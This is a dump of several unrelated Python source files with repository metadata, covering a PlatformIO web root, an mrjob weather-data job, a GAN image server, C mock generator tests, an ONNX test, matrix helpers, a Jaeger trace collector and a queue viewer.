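The hourly binning trick used above in isolation: truncating datetime64 values to hour precision groups the samples, and a boolean mask sums events per hour.

import numpy as np

stamps = np.array(['2016-07-30T09:15', '2016-07-30T09:45',
                   '2016-07-30T10:05'], dtype='datetime64[m]')
hours = stamps.astype('datetime64[h]')
events = np.array([1, 1, 1])
for hour in np.unique(hours):
    print(hour, events[hours == hour].sum())   # 09:00 -> 2, 10:00 -> 1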
df48b1fab3b025fdb0b881f82648c4854093fd0e | 1,185 | py | Python | platformio/commands/home/web.py | ysoyipek/platformio-core | 1b2e410f12bd7770d6415264d750e2fd63f697b7 | [
"Apache-2.0"
] | null | null | null | platformio/commands/home/web.py | ysoyipek/platformio-core | 1b2e410f12bd7770d6415264d750e2fd63f697b7 | [
"Apache-2.0"
] | 1 | 2021-06-02T00:23:58.000Z | 2021-06-02T00:23:58.000Z | platformio/commands/home/web.py | ysoyipek/platformio-core | 1b2e410f12bd7770d6415264d750e2fd63f697b7 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2014-present PlatformIO <contact@platformio.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from twisted.internet import reactor # pylint: disable=import-error
from twisted.web import static # pylint: disable=import-error
class WebRoot(static.File):
def render_GET(self, request):
if request.args.get("__shutdown__", False):
reactor.stop()
return "Server has been stopped"
request.setHeader("cache-control",
"no-cache, no-store, must-revalidate")
request.setHeader("pragma", "no-cache")
request.setHeader("expires", "0")
return static.File.render_GET(self, request)
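# A minimal usage sketch (not part of the original module; directory name
# and port are illustrative):
#
#     from twisted.web.server import Site
#     reactor.listenTCP(8008, Site(WebRoot("public")))
#     reactor.run()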
| 38.225806 | 74 | 0.704641 | 160 | 1,185 | 5.18125 | 0.63125 | 0.072376 | 0.031363 | 0.038601 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009514 | 0.201688 | 1,185 | 30 | 75 | 39.5 | 0.866808 | 0.540928 | 0 | 0 | 0 | 0 | 0.198864 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.166667 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df49a60668055e5fddda30538086675d22b98c78 | 1,474 | py | Python | task01.py | ryandhjeon/ncdc-analysis | ebeefe329dfe0c5eff73e242a9868ebd29515856 | [
"MIT"
] | null | null | null | task01.py | ryandhjeon/ncdc-analysis | ebeefe329dfe0c5eff73e242a9868ebd29515856 | [
"MIT"
] | null | null | null | task01.py | ryandhjeon/ncdc-analysis | ebeefe329dfe0c5eff73e242a9868ebd29515856 | [
"MIT"
] | null | null | null | from mrjob.job import MRJob
from mrjob.step import MRStep
from datetime import datetime
class MRTask01(MRJob):
def steps(self):
return [
MRStep(mapper=self.mapper1,
reducer=self.reducer1),
MRStep(reducer=self.reducer2)
]
def mapper1(self, _, line):
values = line.split()
try:
id = int(values[0])
year = int(values[2])
            if 1920 <= year <= 1940:
yield id, year
except ValueError:
pass
    def reducer1(self, key, value):
        year_set_list = list(set(value))
date1 = datetime(day=1, month=1, year=1920)
date2 = datetime(day=1, month=1, year=1941)
diff_year = int(date2.strftime("%Y")) - int(date1.strftime("%Y"))
val = (0.8 * diff_year)
if len(year_set_list) >= val:
yield None, key
if len(year_set_list) >= diff_year:
yield key, None
year_count = int(len(year_set_list))
yield None, (year_count, key, year_set_list)
def reducer2(self, _, values):
count = 0
for year_count, key, year_set_list in sorted(values, reverse=True):
count += 1
if count <= 50:
yield (year_count, key), year_set_list
if __name__ == '__main__':
MRTask01.run()
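# Run like any mrjob script (input path is illustrative):
#     python task01.py ncdc_records.txt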
| 25.859649 | 75 | 0.545455 | 185 | 1,474 | 4.162162 | 0.345946 | 0.063636 | 0.1 | 0.054545 | 0.188312 | 0.146753 | 0 | 0 | 0 | 0 | 0 | 0.043478 | 0.34464 | 1,474 | 56 | 76 | 26.321429 | 0.753623 | 0 | 0 | 0 | 0 | 0 | 0.008141 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.093023 | false | 0.023256 | 0.069767 | 0.023256 | 0.209302 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df4a26ff3ff45ae362bf9dfb4da8f35474ae51c2 | 2,595 | py | Python | server.py | ryanbloom/gan-explorer | e3f0412b4e204af2035721a16e33f0bfdc14f3ac | [
"MIT"
] | null | null | null | server.py | ryanbloom/gan-explorer | e3f0412b4e204af2035721a16e33f0bfdc14f3ac | [
"MIT"
] | null | null | null | server.py | ryanbloom/gan-explorer | e3f0412b4e204af2035721a16e33f0bfdc14f3ac | [
"MIT"
] | null | null | null | import os
import sys
import io
import pickle
import torch
import functools
from PIL import Image
from starlette.applications import Starlette
from starlette.responses import Response, FileResponse
from starlette.exceptions import HTTPException
from starlette.staticfiles import StaticFiles
from starlette.routing import Mount, Route
import uvicorn
# Models
dz = 512
sys.path.append("stylegan2-ada-pytorch")
filenames = os.listdir("models")
models = {}
print("Loading models...")
for fname in filenames:
model_name, ext = os.path.splitext(fname)
if ext not in [".pt", ".pkl"]:
continue
with open("models/" + fname, "rb") as f:
G = pickle.load(f)["G_ema"]
G.forward = functools.partial(G.forward, force_fp32=True)
models[model_name] = G
param_count = sum([p.numel() for p in G.parameters()])
print(f"Loaded {model_name} ({param_count} parameters)")
default_model = list(models.keys())[0]
def generate(model_name, latent):
if model_name not in models:
raise HTTPException(400, detail=f"Model \"{model_name}\" not found")
g = models[model_name]
img = g(latent, None)
img = (img.permute(0, 2, 3, 1) * 127.5 + 128).clamp(0, 255).to(torch.uint8)
return img[0].cpu().numpy()
# Decoding latent vectors
enc_digits = 3
max_enc = int(10**enc_digits) - 1
enc_mult = int(10**(enc_digits-1))
def decode_latent(z):
return (torch.Tensor(
[int(z[i:(i+enc_digits)]) for i in range(0, len(z), enc_digits)]
).reshape((1, -1)) / enc_mult) - 2
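# Quick sanity check of the scheme above (each 3-digit group g decodes to
# g / enc_mult - 2):
#     decode_latent("200300100")  # -> tensor([[ 0.,  1., -1.]])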
# Routes
async def home_route(request):
return FileResponse("dist/index.html")
async def generate_route(request):
latent_vector = None
model_name = None
if "model" in request.query_params:
model_name = request.query_params["model"]
else:
model_name = default_model
if "latent" in request.query_params:
try:
latent_vector = decode_latent(request.query_params['latent'])
except ValueError:
pass
if latent_vector is None:
raise HTTPException(400, detail="Invalid latent vector")
else:
latent_vector = torch.randn(1, dz)
output = io.BytesIO()
Image.fromarray(generate(model_name, latent_vector)).save(output, format="PNG")
return Response(output.getvalue(), media_type="image/png")
app = Starlette(routes=[
Route("/", home_route),
Route("/generate", generate_route),
Mount("/", app=StaticFiles(directory="dist"), name="dist")
])
if __name__ == "__main__":
    uvicorn.run(app, host="0.0.0.0", port=int(os.getenv("PORT", 8080)))  # getenv returns a str when PORT is set
| 28.833333 | 83 | 0.670906 | 359 | 2,595 | 4.713092 | 0.398329 | 0.058511 | 0.042553 | 0.027187 | 0.017731 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023923 | 0.194605 | 2,595 | 89 | 84 | 29.157303 | 0.785646 | 0.014258 | 0 | 0.028169 | 0 | 0 | 0.092404 | 0.008222 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028169 | false | 0.014085 | 0.183099 | 0.014085 | 0.267606 | 0.028169 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df4c96ccb340b9ae5841e6add1a11590553d1c14 | 6,569 | py | Python | tests/module_definition/parameter_test.py | BjoernLange/C-Mock-Generator | 91f0e331abf54dc5b6706796c02341e23b2e06d7 | [
"MIT"
] | null | null | null | tests/module_definition/parameter_test.py | BjoernLange/C-Mock-Generator | 91f0e331abf54dc5b6706796c02341e23b2e06d7 | [
"MIT"
] | 3 | 2020-06-07T12:48:17.000Z | 2020-07-26T12:52:45.000Z | tests/module_definition/parameter_test.py | BjoernLange/C-Mock-Generator | 91f0e331abf54dc5b6706796c02341e23b2e06d7 | [
"MIT"
] | null | null | null | from typing import Optional
import pytest
from c_mock_generator.module_definition.exceptions import MockGeneratorError
from c_mock_generator.module_definition.parameter_documentation import \
ParameterDocumentation, ActiveAttributions
from c_mock_generator.module_definition.parameter import Parameter
from c_mock_generator.module_definition.parameter_kind import ParameterKind
from c_mock_generator.module_definition.type import SimpleType, PointerType
def create_parameter_documentation(
identifier: str, parameter_kind: Optional[str] = None,
fixed_length: Optional[int] = None, null_terminated: bool = False,
length_descriptor: Optional[str] = None):
attributions = ActiveAttributions()
if parameter_kind is not None:
attributions.add_attribution(parameter_kind)
if fixed_length is not None:
attributions.add_attribution('fixed-length={}'.format(fixed_length))
if null_terminated:
attributions.add_attribution('null-terminated')
if length_descriptor is not None:
attributions.add_attribution(
'length-descriptor={}'.format(length_descriptor))
return ParameterDocumentation(identifier, attributions)
def test_enrich_with_documentation_fails_on_impossible_combination():
# given:
parameter = Parameter('abc', 'def', SimpleType('int'))
parameter_documentation = create_parameter_documentation(
'abc', parameter_kind='out')
# when:
try:
parameter.enrich_with_documentation(parameter_documentation)
except MockGeneratorError:
return
assert False
def test_initial_kind_is_guessed():
# when:
parameter = Parameter('abc', 'def', PointerType('int', False, 1, False))
# then:
assert parameter.is_input
assert not parameter.is_not_input
assert parameter.is_output
def test_enrich_with_documentation_defaults():
# given:
parameter = Parameter('abc', 'def', SimpleType('int'))
parameter_documentation = create_parameter_documentation('abc')
# when:
parameter.enrich_with_documentation(parameter_documentation)
# then:
assert parameter.kind == ParameterKind.kind_in()
assert parameter.is_input
assert not parameter.is_not_input
assert not parameter.is_output
assert parameter.has_simple_type
assert not parameter.has_pointer_type
assert not parameter.is_single_element
assert not parameter.has_fixed_length
assert parameter.fixed_length is None
assert not parameter.is_null_terminated
assert not parameter.has_length_descriptor
assert parameter.length_descriptor is None
def test_enrich_with_documentation_sets_is_input():
# given:
parameter = Parameter('abc', 'def', PointerType('int', False, 1, False))
parameter_documentation = create_parameter_documentation(
'abc', parameter_kind='out')
# when:
parameter.enrich_with_documentation(parameter_documentation)
# then:
assert parameter.kind == ParameterKind.kind_out()
assert not parameter.is_input
assert parameter.is_not_input
def test_enrich_with_documentation_sets_fixed_length():
# given:
parameter = Parameter('abc', 'def', PointerType('int', False, 1, False))
parameter_documentation = create_parameter_documentation('abc',
fixed_length=4)
# when:
parameter.enrich_with_documentation(parameter_documentation)
# then:
assert parameter.kind == ParameterKind.kind_in_out()
assert parameter.fixed_length == 4
def test_enrich_with_documentation_defaults_for_pointers():
# given:
parameter = Parameter('abc', 'def', PointerType('int', False, 1, False))
documentation = create_parameter_documentation('abc')
# when:
parameter.enrich_with_documentation(documentation)
# then:
assert not parameter.has_simple_type
assert parameter.has_pointer_type
assert parameter.is_single_element
assert not parameter.has_fixed_length
assert parameter.fixed_length is None
assert not parameter.is_null_terminated
assert not parameter.has_length_descriptor
assert parameter.length_descriptor is None
def test_enrich_with_documentation_sets_is_null_terminated():
# given:
parameter = Parameter('abc', 'def', PointerType('int', False, 1, False))
documentation = create_parameter_documentation('abc', null_terminated=True)
# when:
parameter.enrich_with_documentation(documentation)
# then:
assert parameter.is_null_terminated
def test_enrich_with_documentation_sets_length_descriptor():
# given:
parameter = Parameter('abc', 'def', PointerType('int', False, 1, False))
documentation = create_parameter_documentation(
'abc', length_descriptor='size')
# when:
parameter.enrich_with_documentation(documentation)
# then:
assert parameter.has_length_descriptor
assert parameter.length_descriptor == 'size'
def test_char_pointer_type_is_reported_as_c_string():
# when:
parameter = Parameter('abc', 'def', PointerType('char', False, 1, False))
# then:
assert parameter.has_c_string_type
assert not parameter.has_utf8_string_type
assert not parameter.has_no_string_type
def test_wchar_pointer_type_is_reported_as_utf8_string():
# when:
parameter = Parameter('abc', 'def',
PointerType('wchar_t', False, 1, False))
# then:
assert not parameter.has_c_string_type
assert parameter.has_utf8_string_type
assert not parameter.has_no_string_type
@pytest.mark.parametrize('c_type', [
SimpleType('int'),
PointerType('int', False, 1, False),
PointerType('char', False, 2, False),
])
def test_types_not_reported_as_c_string(c_type):
# when:
parameter = Parameter('abc', 'def', c_type)
# then:
assert not parameter.has_c_string_type
assert not parameter.has_utf8_string_type
assert parameter.has_no_string_type
def test_from_parameter_list_raises_error_when_parameter_list_is_empty():
# when:
try:
Parameter.from_parameter_list('', 'abc')
except MockGeneratorError:
return
assert False
@pytest.mark.parametrize(('c_type', 'expected_type'), [
(SimpleType('int'), SimpleType('int')),
(PointerType('int', True, 1, True), PointerType('int', True, 1, False)),
])
def test_struct_type(c_type, expected_type):
# given:
parameter = Parameter('abc', 'def', c_type)
# when:
struct_type = parameter.struct_type
# then:
assert struct_type == expected_type
| 31.581731 | 79 | 0.732379 | 763 | 6,569 | 5.982962 | 0.121887 | 0.069003 | 0.074918 | 0.063089 | 0.717415 | 0.632202 | 0.531873 | 0.475575 | 0.459584 | 0.40701 | 0 | 0.00334 | 0.179479 | 6,569 | 207 | 80 | 31.7343 | 0.843599 | 0.030294 | 0 | 0.401575 | 0 | 0 | 0.038188 | 0 | 0 | 0 | 0 | 0 | 0.338583 | 1 | 0.110236 | false | 0 | 0.055118 | 0 | 0.188976 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df4d2925d7d80db583bc0844ba5d1903f8ecf247 | 959 | py | Python | ex17.py | munyamunya/python-excercise | afb217e4cac74c98a41d3c255acb28a61941ee9d | [
"MIT"
] | null | null | null | ex17.py | munyamunya/python-excercise | afb217e4cac74c98a41d3c255acb28a61941ee9d | [
"MIT"
] | null | null | null | ex17.py | munyamunya/python-excercise | afb217e4cac74c98a41d3c255acb28a61941ee9d | [
"MIT"
] | null | null | null | # Exercise 17: Pay off a loan (ex17.py)
# Write a program that traces what happens to a debt when a fixed amount is repaid every month.
# Given the amount of the debt, the annual interest rate (%), and the monthly repayment, the
# program prints the month number and the remaining debt each month until the debt is gone.
# Each month the debt grows by the annual rate / 12 (prorated monthly) and shrinks by the repayment.
# Sample run:
# Debt> 100000
# Annual interest rate (%)> 14.0
# Repayment> 20000
# Month 1: repaid 20000 yen, remaining 81166 yen
# Month 2: repaid 20000 yen, remaining 62113 yen
# Month 3: repaid 20000 yen, remaining 42838 yen
# Month 4: repaid 20000 yen, remaining 23338 yen
# Month 5: repaid 20000 yen, remaining 3610 yen
# Month 6: repaid 3652 yen. Paid off. Total repaid: 103652 yen
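# The recurrence being simulated, with r = annual interest rate in percent:
#     balance_next = balance * (1 + r / 12 / 100) - repayment
# e.g. month 1: 100000 * (1 + 14.0 / 12 / 100) - 20000 = 81166.66..., printed as 81166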
dept = float(input("Debt> "))
annual_interest_rate = float(input("Annual interest rate (%)> "))
repayment = int(input("Repayment> "))
month = 1
while dept > 0:
    if dept - repayment > 0:
        dept = dept + (dept * annual_interest_rate / 12 / 100) - repayment
        print("Month {}: repaid {} yen, remaining {} yen".format(month, repayment, int(dept)))
        month = month + 1
    else:
        # the final payment accrues one month of interest as well
        dept = dept + (dept * annual_interest_rate / 12 / 100)
        print("Month {}: repaid {} yen. Paid off. Total repaid: {} yen".format(
            month, int(dept), int(repayment * (month - 1) + dept)))
        break
| 27.4 | 103 | 0.625652 | 140 | 959 | 4.257143 | 0.442857 | 0.080537 | 0.075503 | 0.092282 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.151272 | 0.221064 | 959 | 34 | 104 | 28.205882 | 0.646586 | 0.466111 | 0 | 0 | 0 | 0 | 0.139959 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df5034fa78cbb9988aa4d1002234629ac70f8650 | 1,722 | py | Python | onnx/test/tools_test.py | cnheider/onnx | 8e9c7d57f7c5aa6f6eb7ee7abb0ba2a243781933 | [
"MIT"
] | 137 | 2020-04-28T12:28:32.000Z | 2022-03-18T10:48:25.000Z | onnx/test/tools_test.py | cnheider/onnx | 8e9c7d57f7c5aa6f6eb7ee7abb0ba2a243781933 | [
"MIT"
] | 24 | 2020-05-06T08:06:42.000Z | 2021-12-31T07:46:13.000Z | onnx/test/tools_test.py | cnheider/onnx | 8e9c7d57f7c5aa6f6eb7ee7abb0ba2a243781933 | [
"MIT"
] | 24 | 2020-05-06T11:43:22.000Z | 2022-03-18T10:50:35.000Z | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import unittest
import onnx
from onnx.tools import update_model_dims
from onnx import helper, TensorProto
class TestToolsFunctions(unittest.TestCase):
def test_update_inputs_outputs_dim(self): # type: () -> None
node_def = helper.make_node(
"Conv",
inputs=['x', 'W'],
outputs=['y'],
kernel_shape=[3, 3],
strides=[2, 2],
)
graph_def = helper.make_graph(
[node_def],
'test',
[helper.make_tensor_value_info('x', TensorProto.FLOAT, [1, 1, 5, 5]),
helper.make_tensor_value_info('W', TensorProto.FLOAT, [1, 1, 3, 3])],
[helper.make_tensor_value_info('y', TensorProto.FLOAT, [1, 1, 2, 2])]
)
model_def = helper.make_model(graph_def, producer_name='test')
updated_def = update_model_dims.update_inputs_outputs_dims(
model_def,
{
"x": [1, 1, 'x1', -1],
"W": [1, 1, 3, 3],
},
{
"y": [1, 1, -1, -1],
})
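        # A -1 entry is replaced with an auto-generated symbolic dim named
        # "<tensor>_<axis>" (e.g. 'x_3'), which the assertions below verify.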
onnx.checker.check_model(updated_def)
self.assertEqual(updated_def.graph.input[0].type.tensor_type.shape.dim[2].dim_param, 'x1')
self.assertEqual(updated_def.graph.input[0].type.tensor_type.shape.dim[3].dim_param, 'x_3')
self.assertEqual(updated_def.graph.output[0].type.tensor_type.shape.dim[2].dim_param, 'y_2')
self.assertEqual(updated_def.graph.output[0].type.tensor_type.shape.dim[3].dim_param, 'y_3')
if __name__ == '__main__':
unittest.main()
| 36.638298 | 100 | 0.606272 | 224 | 1,722 | 4.321429 | 0.263393 | 0.016529 | 0.066116 | 0.103306 | 0.356405 | 0.278926 | 0.278926 | 0.278926 | 0.278926 | 0.241736 | 0 | 0.031348 | 0.259001 | 1,722 | 46 | 101 | 37.434783 | 0.727273 | 0.009292 | 0 | 0 | 0 | 0 | 0.024648 | 0 | 0 | 0 | 0 | 0 | 0.097561 | 1 | 0.02439 | false | 0 | 0.195122 | 0 | 0.243902 | 0.02439 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df50c3432b15ea04d712fd237733f2cc20205308 | 2,551 | py | Python | StripeCaller/caller/mat_ops.py | seanpatrickmoran/StripeCaller | 1a6de26cd20570087f18da09228cf714eae81f2d | [
"MIT"
] | null | null | null | StripeCaller/caller/mat_ops.py | seanpatrickmoran/StripeCaller | 1a6de26cd20570087f18da09228cf714eae81f2d | [
"MIT"
] | null | null | null | StripeCaller/caller/mat_ops.py | seanpatrickmoran/StripeCaller | 1a6de26cd20570087f18da09228cf714eae81f2d | [
"MIT"
] | null | null | null | import numpy as np
import scipy.sparse as sp
def subsetNpMatrix(matrix, row_bounds, column_bounds):
rows = np.array([x for x in range(row_bounds[0], row_bounds[1]) if 0 <= int(x) < matrix.shape[0]])
cols = np.array([y for y in range(column_bounds[0], column_bounds[1]) if 0 <= int(y) < matrix.shape[1]])
if len(rows)==0 or len(cols)==0:
return np.empty(0)
subset = (matrix.ravel()[(cols + (rows * matrix.shape[1]).reshape((-1, 1))).ravel()]).reshape(rows.size, cols.size)
return subset
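# Out-of-range bounds are clipped rather than raising, e.g.:
#     subsetNpMatrix(np.arange(9).reshape(3, 3), (-1, 2), (1, 4))
#     # -> array([[1, 2],
#     #           [4, 5]])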
def strata2triu(strata):
mat = np.zeros((len(strata[0]), len(strata[0])))
for i in range(len(strata)):
for j in range(len(strata[i])):
mat[j, j + i] = strata[i][j]
return mat
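# Stratum i holds the i-th superdiagonal, e.g.:
#     strata2triu([[1, 2, 3], [4, 5], [6]])
#     # -> [[1, 4, 6],
#     #     [0, 2, 5],
#     #     [0, 0, 3]]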
def strata2horizontal(strata):
hmat = np.zeros((len(strata[0]), len(strata)))
for i in range(len(strata)):
hmat[:len(strata[i]), i] = strata[i]
return hmat
def strata2vertical(strata):
vmat = np.zeros((len(strata[0]), len(strata)))
for i in range(len(strata)):
vmat[i:, i] = strata[i]
return vmat
def blank_diagonal2(matr, strata=0):
    """
    in: matrix (anything scipy.sparse.coo_matrix accepts), strata (n entries off the main diagonal to zero)
    out: CSR matrix with the diagonal band blanked
    """
# int_shape = (int(max(matr[:,1])+1), int(max(matr[:,1])+1))
# coo = sp.coo_matrix((matr[:, 2], (matr[:, 0], matr[:, 1])), shape=int_shape, dtype=matr.dtype)
# csr = coo.tocsr()
# csr_org = csr.copy()
coo = sp.coo_matrix(matr)
csr = coo.tocsr()
lil = csr.tolil()
for i in range(lil.shape[0]):
lil[i:i+strata+1,i:i+strata+1] = 0
csr = lil.tocsr()
return csr
def blank_diagonal(mat, nstrata=0):
return np.triu(mat, nstrata) if nstrata > 0 else mat
def blank_diagonal_sparse_from_strata(strata, nstrata=0):
"""
# >>> strata = [np.array([1, 2, 3, 4]), np.array([5, 6, 7]), np.array([8, 9])]
# >>> blank_diagonal_sparse_from_strata(strata, nstrata=1)
"""
size = len(strata[0])
padded_strata = [
np.concatenate([np.zeros(shape=(i,)), strata[i]]) for i in range(len(strata))
]
for i in range(nstrata):
padded_strata[i] = np.zeros((size,))
diags = np.arange(len(strata))
return sp.spdiags(padded_strata, diags, size, size, format='csr')
if __name__ == '__main__':
strata = [np.array([1, 2, 3, 4]), np.array([5, 6, 7]), np.array([8, 9])]
mat = blank_diagonal_sparse_from_strata(strata, nstrata=1)
print(mat.toarray())
# [[0. 5. 8. 0.]
# [0. 0. 6. 9.]
# [0. 0. 0. 7.]
# [0. 0. 0. 0.]]
| 30.73494 | 119 | 0.592317 | 405 | 2,551 | 3.641975 | 0.219753 | 0.085424 | 0.024407 | 0.044746 | 0.330847 | 0.252203 | 0.24678 | 0.169492 | 0.111186 | 0.111186 | 0 | 0.036555 | 0.21717 | 2,551 | 82 | 120 | 31.109756 | 0.702053 | 0.196786 | 0 | 0.0625 | 0 | 0 | 0.005497 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.145833 | false | 0 | 0.041667 | 0.020833 | 0.354167 | 0.020833 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df56b842f640e25a4f3079105b09af9465ab1377 | 2,388 | py | Python | toolchain/plugins/measure_jaeger.py | the-redback/pptam-tool | 52b9cbd591f82d9ecc68dea1bbeac33701f08a21 | [
"MIT"
] | null | null | null | toolchain/plugins/measure_jaeger.py | the-redback/pptam-tool | 52b9cbd591f82d9ecc68dea1bbeac33701f08a21 | [
"MIT"
] | null | null | null | toolchain/plugins/measure_jaeger.py | the-redback/pptam-tool | 52b9cbd591f82d9ecc68dea1bbeac33701f08a21 | [
"MIT"
] | null | null | null | import logging
import requests
import json
import os
import time
def after(current_configuration, output, test_id):
jaeger_host = current_configuration["jaeger_host_url"]
jaeger_services = current_configuration["jaeger_services"].split(" ")
service_to_test = current_configuration["jaeger_test_if_service_is_present"]
all_services = []
for _ in range(60):
try:
session = requests.Session()
session.headers.update({'accept': 'application/json'})
session.headers.update({'content-type': 'application/json'})
logging.info(f"Contacting Jaeger host {jaeger_host}/api/services")
service_request = session.get(f"{jaeger_host}/api/services")
all_services = service_request.json()["data"]
if all_services is None:
logging.critical(f"Cannot determine Jaeger services.")
else:
if (service_to_test != "") and not (service_to_test in all_services):
logging.critical(f"Service {service_to_test} is not in the list of services.")
else:
break
except Exception as e:
logging.critical(f"Exception while determining Jaeger services: {e}")
time.sleep(60)
    if (all_services is not None) and ((service_to_test == "") or (service_to_test in all_services)):
for service in all_services:
if ("all" in jaeger_services) or (service in jaeger_services):
if f"!{service}" in jaeger_services:
logging.debug(f"Skipping service {service}.")
else:
file_to_write = os.path.join(output, f"jaeger_{service}.log")
try:
                        logging.info(f"Writing Jaeger data for service {service}.")
with open(file_to_write, "a") as f:
request = session.get(f"{jaeger_host}/api/traces?service=" + service)
data = json.loads(request.content)["data"]
f.write(json.dumps(data, indent=2))
except Exception as e2:
logging.critical(f"Exception while reading Jaeger data for service {service}: {e2}")
else:
logging.critical(f"Cannot store Jaeger service data.") | 44.222222 | 111 | 0.581658 | 267 | 2,388 | 5.022472 | 0.303371 | 0.07308 | 0.058166 | 0.03132 | 0.170022 | 0.085011 | 0.046234 | 0 | 0 | 0 | 0 | 0.004302 | 0.318677 | 2,388 | 54 | 112 | 44.222222 | 0.819914 | 0 | 0 | 0.133333 | 0 | 0 | 0.237756 | 0.049393 | 0 | 0 | 0 | 0 | 0 | 1 | 0.022222 | false | 0 | 0.111111 | 0 | 0.133333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df59e95731903dc924bbf2b74288527f5c9aeccf | 984 | py | Python | utils/queue_viewer.py | VDL-PRISM/dylos | 16bfcc9925d4e18793b4b004bd3ba55d243de450 | [
"Apache-2.0"
] | null | null | null | utils/queue_viewer.py | VDL-PRISM/dylos | 16bfcc9925d4e18793b4b004bd3ba55d243de450 | [
"Apache-2.0"
] | 11 | 2017-12-07T22:45:41.000Z | 2018-01-26T20:44:21.000Z | utils/queue_viewer.py | VDL-PRISM/dylos | 16bfcc9925d4e18793b4b004bd3ba55d243de450 | [
"Apache-2.0"
] | null | null | null | import argparse
from datetime import datetime
import msgpack
from persistent_queue import PersistentQueue
import pytz
from tabulate import tabulate
parser = argparse.ArgumentParser(description='View data from a queue')
parser.add_argument('queue')
parser.add_argument('start', type=int)
parser.add_argument('end', type=int)
args = parser.parse_args()
file = args.queue
start = args.start
end = args.end
queue = PersistentQueue(file,
dumps=msgpack.packb,
loads=msgpack.unpackb)
if end == 0:
data = queue.peek(len(queue))
else:
data = queue.peek(end)
data = data[start:]
data = [(humidity, large, datetime.utcfromtimestamp(sampletime).replace(tzinfo=pytz.utc), sequence, small, temperature)
for humidity, large, sampletime, sequence, small, temperature in data]
table = tabulate(data, headers=["Humidity", "Large", "Sample Time",
"Sequence", "Small", "Temperature"])
print(table)
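# Example (queue file name is illustrative); passing end=0 peeks the whole queue:
#     python queue_viewer.py sensor.queue 0 0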
| 26.594595 | 119 | 0.688008 | 117 | 984 | 5.74359 | 0.435897 | 0.040179 | 0.075893 | 0.065476 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001267 | 0.198171 | 984 | 36 | 120 | 27.333333 | 0.850444 | 0 | 0 | 0 | 0 | 0 | 0.08435 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.222222 | 0 | 0.222222 | 0.037037 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df59f4730e20867d4ca7c619bfd2bad305c5e7b7 | 4,002 | py | Python | Python_OCR_JE/venv/Lib/site-packages/numpy/typing/tests/data/pass/fromnumeric.py | JE-Chen/je_old_repo | a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5 | [
"MIT"
